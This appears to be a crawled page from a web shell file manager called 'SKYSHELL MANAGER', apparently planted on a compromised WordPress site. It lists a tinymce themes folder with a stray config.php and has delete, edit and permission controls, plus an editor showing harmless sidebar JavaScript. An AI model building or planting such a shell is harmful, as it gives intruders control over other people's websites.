📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
39395.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: admin.js
jQuery( document ).ready( function () { jQuery( '.woo-conditions.tabs' ).tabs(); jQuery( '.woo-conditions.tabs .inner-tabs' ).tabs(); jQuery( '#woosidebars-conditions .advanced-settings a' ).click( function ( e ) { jQuery( '#woosidebars-conditions .tabs li.advanced' ).toggleClass( 'hide' ); var new_status = '1'; // Do display. if ( jQuery( '#woosidebars-conditions .tabs li.advanced' ).hasClass( 'hide' ) ) { new_status = '0'; // Don't display. } // Perform the AJAX call. jQuery.post( ajaxurl, { action : 'woosidebars-toggle-advanced-items', woosidebars_advanced_noonce : woosidebars_localized_data.woosidebars_advanced_noonce, new_status: new_status }, function( response ) {} ); return false; }); });
Save